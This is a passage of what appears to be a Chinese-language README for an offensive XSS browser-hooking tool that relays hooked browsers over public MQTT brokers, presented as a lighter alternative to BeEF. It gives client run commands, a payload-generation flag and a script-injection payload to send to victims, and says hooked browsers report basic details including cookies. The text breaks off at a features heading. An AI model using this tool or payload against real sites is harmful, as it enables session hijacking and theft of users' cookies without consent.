
与 beef 或 xsshunter 相比,使用本工具的好处在于,除了托管 JS payload 之外无需任何基础设施搭建;你可以使用公共 broker(不过目前使用混淆,加密功能正在开发中)。
已挂钩的浏览器将在你指定的 broker 上的 MQTT 主题中进行通信,有许多公共/免费 broker 可用于测试。
客户端使用 Python 的 paho.mqtt 库,而 JS payload 使用 'mqttws31.min.js',该文件从 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js' 获取。

要生成用于挂钩浏览器的 JS payload,请在运行时设置 -g 标志,并提供你的 broker、端口和主题变量。这样会在 /js/ 文件夹中创建你的 payload。
运行客户端:按如下方式提供你的 broker、端口和主题
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname
使用凭据运行客户端:按如下方式提供你的 broker、端口、用户名、密码和主题
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password
向受害者发送你的 XSS payload,同时保持 mqxss 客户端运行,例如:'"><script src=https://example.com/x.js async></script> 或类似内容。如果目标存在漏洞,你应该会收到通知,提示浏览器已连接,并附带一些基本信息,包括 cookie 等。

功能: